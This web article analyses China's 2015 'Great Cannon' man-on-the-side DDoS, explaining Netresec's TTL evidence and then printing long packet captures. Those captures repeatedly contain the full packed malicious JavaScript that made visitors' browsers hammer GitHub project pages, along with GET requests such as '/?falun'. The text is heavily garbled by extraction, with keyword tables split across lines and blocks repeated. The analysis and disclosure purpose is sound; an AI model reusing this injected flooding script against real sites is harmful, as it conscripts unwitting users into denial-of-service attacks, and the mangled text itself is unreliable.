Great Cannon of China Man-on-the-side DDoS Attack - Actual Traffic and Analysis

"send2

responseTime

count

x3c

unixtime

startime

write

document

https

github

NUM

src

get

http

requestTime

js

r_send

setTimeout

getMonth

getDay

getMinutes

getSeconds

1E3

baidu

min

2E3

greatfire

cn

nytimes

libs

length

window

jQuery

code

aj ax

url

dataType

timeou"

And this is state sponsored China hostile activity at its worst, legitimate users landing on a China website using Baidu's tracking code (Baidu being the largest by far Search Engine in China) are parsing this Javascript which tells the users browser to open connections to the targets. Researchers at Sweden-based Netresec analyzed the technical fingerprints of the malicious JavaScript and found they are different from the remainder of the non-malicious traffic received by the one percent of computers conscripted into the DDoS army. For instance, the time to live limits placed on how long packets should be accepted by end-user computers are vastly different for the malicious content—from 30 to 229 compared with 42 for legitimate analytics code. The Netresec researchers also tried blocking one of the malicious packets so that a request would be made to the originating server for the packets to be resent. The requests were ignored. Both observations are consistent with the DDoS code being inserted by someone other than the websites using the Baidu analytics service.

Netresec could clearly identify that a man-in-the-middle was happening by looking at the TTL fields in the packets. TTL, or time-to-live, is a field in all Internet packets that tracks the age of the packet. Each time a router forwards a packet, one is subtracted from the field. When it reaches zero, the packet is discarded. This prevents routing loops from endlessly forwarding packets around in circle.

Many systems send packets with a starting TTL of 64. Thus, when a packet arrives with a value of 46, you know that that there are 18 hops between you and the sender (64 - 18 = 46).

Here is our converted PCAP traffic sample of what was happening:

2015-04-03 11:41:16.361127 IP 192.150.187.17.31161 > 123.125.115.164.80: P 1:119(118) ack 1 win 8192 E...0:..@..V....{}s.y..P...eX.H^P. .....GET /a.js HTTP/1.1 User-Agent: Wget/1.15 (linux-gnu) Accept: */* Host: eclick.baidu.com Connection: Keep-Alive 2015-04-03 11:41:16.722461 IP 123.125.115.164.80 > 192.150.187.17.31161: P 1:108(107) ack 119 win 767 E....X.....B{}s......Py.X.H^....P.......HTTP/1.1 200 OK Server: Apache Connection: close Content-Type: text/javascript Content-Length: 1130 2015-04-03 11:41:16.722866 IP 123.125.115.164.80 > 192.150.187.17.31161: P 108:1132(1024) ack 1 win 768 E..(.......H{}s......Py.X.H....eP....W.. eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!'.replace(/^/,String)){while(c--)r[e(c)]=k[c]

e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};whil e(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=[ "m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'

function

Date

script

new

var

jquery

com

getTi me

url_array

r_send2

responseTime

count

x3c

unixtime

startime

write

document

https

github

NUM

src

get

http

requestTime

js

r_send

setTimeout

getMonth

getDay

getMinutes

getSeconds

1E3

baidu

min

2E3

greatfire

cn

nytimes

libs

length

window

jQuery

code

aj ax

url

dataType

timeou 2015-04-03 11:41:16.722884 IP 123.125.115.164.80 > 192.150.187.17.31161: FP 1132:1238(106) ack 1 win 769 E...........{}s......Py.X.L....eP...(...t

1E4

cache

beforeSend

latest

complete

return

Math

floor

3E5

UTC

getFullYear

getHours'.split('

'),0,{}))

2015-04-03 11:41:17.386631 IP 192.150.187.17.31161 > 123.125.115.164.80: P 1:119(118) ack 1 win 8192 E...0:..@..V....{}s.y..P...eX.H^P. .....GET /a.js HTTP/1.1 User-Agent: Wget/1.15 (linux-gnu) Accept: */* Host: eclick.baidu.com Connection: Keep-Alive 2015-04-03 11:41:17.774049 IP 123.125.115.164.80 > 192.150.187.17.31161: . ack 119 win 14600 E..(.O@.,...{}s......Py.X.H^....P.9........... 2015-04-03 11:41:17.774467 IP 123.125.115.164.80 > 192.150.187.17.31161: P 1:312(311) ack 119 win 14600 E.._.P@.,...{}s......Py.X.H^....P.9..A..HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Apr 2015 15:41:17 GMT Content-Type: application/x-javascript Content-Length: 0 Last-Modified: Fri, 03 Apr 2015 08:55:28 GMT Connection: keep-alive ETag: "551e5580-0" Expires: Fri, 03 Apr 2015 16:41:17 GMT Cache-Control: max-age=3600 Accept-Ranges: bytes

2015-04-03 16:56:49.500107 IP 192.150.187.17.20000 > 123.125.65.120.80: S 3993609:3993609(0) win 8192 E..(......lJ....{}AxN .P.<. ....P. ..... 2015-04-03 16:56:49.513486 IP 192.150.187.17.20000 > 123.125.65.120.80: . ack 10033422 win 8192 E..(......lJ....{}AxN .P.<. ....P. ..... 2015-04-03 16:56:49.521300 IP 192.150.187.17.20000 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192 E..F......k+....{}AxN .P.<. ....P. .Z...GET /js/o.js HTTP/1.1 Host: cbjs.baidu.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.guokr.com/article/437015/ Connection: keep-alive 2015-04-03 16:56:49.529089 IP 192.150.187.17.20000 > 123.125.65.120.80: S 3993896:3993896(0) win 8192 E..(......lH....{}AxN .P.<.(....P. ..p.. 2015-04-03 16:56:49.537135 IP 192.150.187.17.20000 > 123.125.65.120.80: . ack 1 win 8192 E..(......lH....{}AxN .P.<.)....P. ..... 2015-04-03 16:56:49.545312 IP 192.150.187.17.20000 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192 E.........k.....{}AxN .P.<.)....P. .P1..GET /?falun HTTP/1.1 User-Agent: Wget/1.15 (linux-gnu) Accept: */* Host: www.google.com Connection: Keep-Alive 2015-04-03 16:56:49.553116 IP 192.150.187.17.20001 > 123.125.65.120.80: S 17314055:17314055(0) win 8192 E..(......lF....{}AxN!.P..1.....P. ..... 2015-04-03 16:56:49.561119 IP 192.150.187.17.20001 > 123.125.65.120.80: . ack 21433245 win 8192 E..(......lF....{}AxN!.P..1..G..P. ..... 2015-04-03 16:56:49.569559 IP 192.150.187.17.20001 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192 E..F......k'....{}AxN!.P..1..G..P. .%...GET /js/o.js HTTP/1.1 Host: cbjs.baidu.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.guokr.com/article/437015/ Connection: keep-alive 2015-04-03 16:56:49.577146 IP 192.150.187.17.20001 > 123.125.65.120.80: S 17314342:17314342(0) win 8192 E..(......lD....{}AxN!.P..2&....P. ..... 2015-04-03 16:56:49.585074 IP 192.150.187.17.20001 > 123.125.65.120.80: . ack 1 win 8192 E..(......lD....{}AxN!.P..2'.G..P. ..... 2015-04-03 16:56:49.593233 IP 192.150.187.17.20001 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192 E.........k.....{}AxN!.P..2'.G..P. ..*..GET /?falun HTTP/1.1 User-Agent: Wget/1.15 (linux-gnu) Accept: */* Host: www.google.com Connection: Keep-Alive

2015-04-03 16:56:49.702218 IP 192.150.187.17.20004 > 123.125.65.120.80: S 615002:615002(0) win 8192 E..(......l:....{}AxN$.P. bZ....P. ..m.. 2015-04-03 16:56:49.709823 IP 192.150.187.17.20004 > 123.125.65.120.80: . ack 29776619 win 8192 E..(......l:....{}AxN$.P. b[..Z.P. .I... 2015-04-03 16:56:49.718088 IP 192.150.187.17.20004 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192 E..F......k.....{}AxN$.P. b[..Z.P. ..^..GET /js/o.js HTTP/1.1 Host: cbjs.baidu.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.guokr.com/article/437015/ Connection: keep-alive 2015-04-03 16:56:49.725818 IP 192.150.187.17.20004 > 123.125.65.120.80: S 615289:615289(0) win 8192 E..(......l8....{}AxN$.P. cy....P. ..N.. 2015-04-03 16:56:49.737804 IP 192.150.187.17.20004 > 123.125.65.120.80: . ack 1 win 8192 E..(......l8....{}AxN$.P. cz..Z.P. .H... 2015-04-03 16:56:49.746030 IP 192.150.187.17.20004 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192 E.........k.....{}AxN$.P. cz..Z.P. .....GET /?falun HTTP/1.1 User-Agent: Wget/1.15 (linux-gnu) Accept: */* Host: www.google.com Connection: Keep-Alive 2015-04-03 16:56:49.753793 IP 192.150.187.17.20005 > 123.125.65.120.80: S 23124395:23124395(0) win 8192 E..(......l6....{}AxN%.P.`......P. .-... 2015-04-03 16:56:49.761856 IP 192.150.187.17.20005 > 123.125.65.120.80: . ack 31158638 win 8192 E..(......l6....{}AxN%.P.`....qnP. ..k.. 2015-04-03 16:56:49.770528 IP 192.150.187.17.20005 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192 E..F......k.....{}AxN%.P.`....qnP. .....GET /js/o.js HTTP/1.1 Host: cbjs.baidu.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.guokr.com/article/437015/ Connection: keep-alive 2015-04-03 16:56:49.777836 IP 192.150.187.17.20005 > 123.125.65.120.80: S 23124682:23124682(0) win 8192 E..(......l4....{}AxN%.P.`......P. .,... 2015-04-03 16:56:49.785806 IP 192.150.187.17.20005 > 123.125.65.120.80: . ack 1 win 8192 E..(......l4....{}AxN%.P.`....qnP. ..L.. 2015-04-03 16:56:49.794034 IP 192.150.187.17.20005 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192 E.........k.....{}AxN%.P.`....qnP. .....GET /?falun HTTP/1.1 User-Agent: Wget/1.15 (linux-gnu) Accept: */* Host: www.google.com Connection: Keep-Alive

2015-04-03 16:56:52.394059 IP 192.150.187.17.20058 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192 .P. .....GET /js/o.js HTTP/1.1 Host: cbjs.baidu.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.guokr.com/article/437015/ Connection: keep-alive 2015-04-03 16:56:52.400648 IP 123.125.65.120.80 > 192.150.187.17.20054: S 1636608291:1636608291(0) ack 2549121 win 2937 E..(l.@...+.{}Ax.....PNVa..#.&..P..y,......... 2015-04-03 16:56:52.401820 IP 192.150.187.17.20058 > 123.125.65.120.80: S 16946615:16946615(0) win 8192 E..(......k`....{}AxNZ.P........P. .q... 2015-04-03 16:56:52.409800 IP 192.150.187.17.20058 > 123.125.65.120.80: . ack 1 win 8192 .P. .b....k`....{}AxNZ.P...... 2015-04-03 16:56:52.411115 IP 123.125.65.120.80 > 192.150.187.17.20054: R 2668727381:2668727381(0) ack 1 win 2941 E..(m.@...(3{}Ax.....PNV..5x.&..P..}.R........ 2015-04-03 16:56:52.418085 IP 192.150.187.17.20058 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192 .P. .....GET /?falun HTTP/1.1. User-Agent: Wget/1.15 (linux-gnu) Accept: */* Host: www.google.com Connection: Keep-Alive

2015-04-03 16:57:03.022068 IP 192.150.187.17.20274 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192 E..F.2....f.....{}AxO2.P.N...HsWP. .....GET /js/o.js HTTP/1.1 Host: cbjs.baidu.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.guokr.com/article/437015/ Connection: keep-alive 2015-04-03 16:57:03.024429 IP 123.125.65.120.80 > 192.150.187.17.20270: S 2758833337:2758833337(0) ack 5647123 win 486 E..(..@.w...{}Ax.....PO..pt..V+.P....=........ 2015-04-03 16:57:03.029860 IP 192.150.187.17.20274 > 123.125.65.120.80: S 5112257:5112257(0) win 8192 E..(.3....h.....{}AxO2.P.N......P. ..... 2015-04-03 16:57:03.030160 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555041284:1555041284(0) ack 1 win 490 E..(.

@.y...{}Ax.....PO.. ...V+.P...x......... 2015-04-03 16:57:03.037899 IP 192.150.187.17.20274 > 123.125.65.120.80: . ack 1 win 8192 E..(.3....h.....{}AxO2.P.N...HsWP. ..... 2015-04-03 16:57:03.038698 IP 123.125.65.120.80 > 192.150.187.17.20270: P 1555041284:1555041391(107) ack 287 win 820 E.......6.u.{}Ax.....PO.. ...V,1P..4....HTTP/1.1 200 OK Server: Apache Connection: close Content-Type: text/javascript Content-Length: 1130 2015-04-03 16:57:03.039348 IP 123.125.65.120.80 > 192.150.187.17.20270: P 1555041391:1555042415(1024) ack 1 win 821 E..(.i..7.n.{}Ax.....PO.. .(.V+.P..5.... eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!'.replace(/^/,String)){while(c--)r[e(c)]=k[c]

e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};whil e(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=[ "m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'

function

Date

script

new

var

jquery

com

getTi me

url_array

r_send2

responseTime

count

x3c

unixtime

startime

write

document

https

github

NUM

src

get

http

requestTime

js

r_send

setTimeout

getMonth

getDay

getMinutes

getSeconds

1E3

baidu

min

2E3

greatfire

cn

nytimes

libs

length

window

jQuery

code

aj ax

url

dataType

timeou 2015-04-03 16:57:03.039388 IP 123.125.65.120.80 > 192.150.187.17.20270: FP 1555042415:1555042521(106) ack 1 win 822 E....u..8.qS{}Ax.....PO.. .(.V+.P..6yK..t

1E4

cache

beforeSend

latest

complete

return

Math

floor

3E5

UTC

getFullYear

getHours'.split('

'),0,{}))

2015-04-03 16:57:03.039395 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555041391:1555041391(0) ack 287 win 489 E..(..@.z...{}Ax.....PO.. .(.V,1P...v......... 2015-04-03 16:57:03.039399 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555042521:1555042521(0) ack 1 win 491 E..(.{@.

...{}Ax.....PO.. ...V+.P...s......... 2015-04-03 16:57:03.039402 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555042415:1555042415(0) ack 1 win 493 E..(..@.~..8{}Ax.....PO.. .(.V+.P...t......... 2015-04-03 16:57:03.045725 IP 123.125.65.120.80 > 192.150.187.17.20270: S 1237632748:1237632748(0) ack 5647410 win 495 E..(..@....K{}Ax.....PO.I....V,2P............. 2015-04-03 16:57:03.047090 IP 192.150.187.17.20274 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192 E....4....g.....{}AxO2.P.N...HsWP. ..

..GET /?falun HTTP/1.1 User-Agent: Wget/1.15 (linux-gnu) Accept: */* Host: www.google.com Connection: Keep-Alive 2015-04-03 16:57:06.966079 IP 192.150.187.17.20354 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192 E..F r....e.....{}AxO..P.....Z.gP. ..w..GET /js/o.js HTTP/1.1 Host: cbjs.baidu.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.guokr.com/article/437015/ Connection: keep-alive 2015-04-03 16:57:06.973800 IP 192.150.187.17.20354 > 123.125.65.120.80: S 830702:830702(0) win 8192 E..( s....f.....{}AxO..P........P. .Zx.. 2015-04-03 16:57:06.974083 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119351077:1119351077(0) ack 1 win 1381 E..(..@.....{}Ax.....PO~......o.P..e.......... 2015-04-03 16:57:06.982296 IP 192.150.187.17.20354 > 123.125.65.120.80: . ack 1 win 8192 E..( s....f.....{}AxO..P.....Z.gP. .d... 2015-04-03 16:57:06.984590 IP 123.125.65.120.80 > 192.150.187.17.20350: P 1119351077:1119351184(107) ack 287 win 823 E.......9.r.{}Ax.....PO~......p.P..7<...HTTP/1.1 200 OK Server: Apache Connection: close Content-Type: text/javascript Content-Length: 1130 2015-04-03 16:57:06.984925 IP 123.125.65.120.80 > 192.150.187.17.20350: P 1119351184:1119352208(1024) ack 1 win 824 E..(.y..:.m.{}Ax.....PO~......o.P..8E... eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!'.replace(/^/,String)){while(c--)r[e(c)]=k[c]

e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};whil e(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=[ "m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'

function

Date

script

new

var

jquery

com

getTi me

url_array

r_send2

responseTime

count

x3c

unixtime

startime

write

document

https

github

NUM

src

get

http

requestTime

js

r_send

setTimeout

getMonth

getDay

getMinutes

getSeconds

1E3

baidu

min

2E3

greatfire

cn

nytimes

libs

length

window

jQuery

code

aj ax

url

dataType

timeou 2015-04-03 16:57:06.984954 IP 123.125.65.120.80 > 192.150.187.17.20350: FP 1119352208:1119352314(106) ack 1 win 825 ..t

1E4

cache

beforeSend

latest

complete

return

Math

floor

3E5

UTC

getFullYear

getHours'.split('

'),0,{}))

2015-04-03 16:57:06.985905 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119351184:1119351184(0) ack 287 win 1384 E..(..@....:{}Ax.....PO~......p.P..h.B........ 2015-04-03 16:57:06.985926 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119352208:1119352208(0) ack 1 win 1386 E..(.3@.....{}Ax.....PO~......o.P..j.^........ 2015-04-03 16:57:06.985930 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119352314:1119352314(0) ack 1 win 1388 E..(..@....j{}Ax.....PO~......o.P..l.......... 2015-04-03 16:57:06.990088 IP 192.150.187.17.20354 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192 E... t....fI....{}AxO..P.....Z.gP. .....GET /?falun HTTP/1.1 User-Agent: Wget/1.15 (linux-gnu) Accept: */* Host: www.google.com Connection: Keep-Alive

2015-04-03 16:17:08.842143 IP 192.150.187.32.11010 > 123.125.65.120.80: P 26809681:26809967(286) ack 5633851 win 8192 E..F.*..@.@.... {}Ax+..P...Q.U.;P. .y...GET /js/o.js HTTP/1.1 Host: cbjs.baidu.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.guokr.com/article/437015/ Connection: keep-alive 2015-04-03 16:17:08.846541 IP 123.125.65.120.80 > 192.150.187.32.11003: P 1:108(107) ack 286 win 2476 E....+..l...{}Ax... .P*..

.5.q..P. .Z...HTTP/1.1 200 OK Server: Apache Connection: close Content-Type: text/javascript Content-Length: 1130 2015-04-03 16:17:08.846955 IP 123.125.65.120.80 > 192.150.187.32.11003: P 108:1132(1024) ack 0 win 2477 E..(....m...{}Ax... .P*..

...q..P. .d... eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!'.replace(/^/,String)){while(c--)r[e(c)]=k[c]

e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};whil e(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=[ "m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'

function

Date

script

new

var

jquery

com

getTi me

url_array

r_send2

responseTime

count

x3c

unixtime

startime

write

document

https

github

NUM

src

get

http

requestTime

js

r_send

setTimeout

getMonth

getDay

getMinutes

getSeconds

1E3

baidu

min

2E3

greatfire

cn

nytimes

libs

length

window

jQuery

code

aj ax

url

dataType

timeou 2015-04-03 16:17:08.846997 IP 123.125.65.120.80 > 192.150.187.32.11003: FP 1132:1238(106) ack 0 win 2478 E.......n...{}Ax... .P*..

...q..P. ..Z..t

1E4

cache

beforeSend

latest

complete

return

Math

floor

3E5

UTC

getFullYear

getHours'.split('

'),0,{}))

2015-04-03 16:17:08.850152 IP 192.150.187.14.11010 > 123.125.65.120.80: P 12182551:12182837(286) ack 27010254 win 8192 E..F.+..@.@.....{}Ax+..P......$.P. .

^..GET /js/o.js HTTP/1.1 Host: cbjs.baidu.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.guokr.com/article/437015/ Connection: keep-alive 2015-04-03 12:58:37.676811 IP 123.125.65.120.80 > 192.150.187.17.19487: P 1:108(107) ack 286 win 704 E....Q.....v{}Ax.....PL..Z@..y.XP.......HTTP/1.1 200 OK Server: Apache Connection: close Content-Type: text/javascript Content-Length: 1130 2015-04-03 12:58:37.677098 IP 123.125.65.120.80 > 192.150.187.17.19487: P 108:1132(1024) ack 0 win 705 E..(.X......{}Ax.....PL..Z@..y.:P....).. eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!'.replace(/^/,String)){while(c--)r[e(c)]=k[c]

e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};whil e(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=[ "m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'

function

Date

script

new

var

jquery

com

getTi me

url_array

r_send2

responseTime

count

x3c

unixtime

startime

write

document

https

github

NUM

src

get

http

requestTime

js

r_send

setTimeout

getMonth

getDay

getMinutes

getSeconds

1E3

baidu

min

2E3

greatfire

cn

nytimes

libs

length

window

jQuery

code

aj ax

url

dataType

timeou 2015-04-03 12:58:37.677131 IP 123.125.65.120.80 > 192.150.187.17.19487: FP 1132:1238(106) ack 0 win 706 E..........#{}Ax.....PL..ZD..y.:P...Tx..t

1E4

cache

beforeSend

latest

complete

return

Math

floor

3E5

UTC

getFullYear

getHours'.split('

'),0,{}))

2015-04-03 12:58:37.690143 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76 E..`........

A.6.......`....E..FL!....3.....{}AxL .P.X.4.#..P. .....GET /js/o.js HTTP/1.1 Host: 2015-04-03 12:58:37.698336 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76 E..`........

A.6.......`....E..FL"....3.....{}AxL!.P..l..$.eP. .H ..GET /js/o.js HTTP/1.1 Host: 2015-04-03 12:58:37.706121 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76 E..`........

A.6.......`....E..FL#....3.....{}AxL".P..i}.,c.P. .....GET /js/o.js HTTP/1.1 Host: 2015-04-03 12:58:37.714311 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76 E..`........

A.6.......`....E..FL$....3.....{}AxL#.P.f...^..P. ..y..GET /js/o.js HTTP/1.1 Host: 2015-04-03 12:58:37.746264 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76 E..`........

A.6.......`....E..FL'....3.....{}AxL&.P.\b...iSP. .....GET /js/o.js HTTP/1.1 Host: 2015-04-03 12:58:37.758229 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76 E..`........

A.6.......`....E..FL)....3.....{}AxL(.P...e..~.P. .....GET /js/o.js HTTP/1.1 Host: 2015-04-03 12:58:37.766636 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76 E..`........

A.6.......`....E..FL*....3.....{}AxL).P.Q......P. .qU..GET /js/o.js HTTP/1.1 Host: 2015-04-03 12:58:37.774319 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76 E..`........

A.6.......`....E..FL+....3.....{}AxL*.P..!J.^..P. .^j..GET /js/o.js HTTP/1.1 Host: 2015-04-03 12:58:37.782302 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76 E..`........

A.6.......`....E..FL,....3.....{}AxL+.P..1..\%.P. .....GET /js/o.js HTTP/1.1 Host:

Find more great Cyber Security Articles, Information, Education, Certifications, Vulnerabilities and Guides at Computer Security.org

Related Articles - Computer, Cyber Security, Computer Security, Network Security, Internet Security, Malware, Adware, Spyware, Viruses, Exploit Kit, Denial of Service,

Email this Article to a Friend! Receive Articles like this one direct to your email box! Subscribe for free today!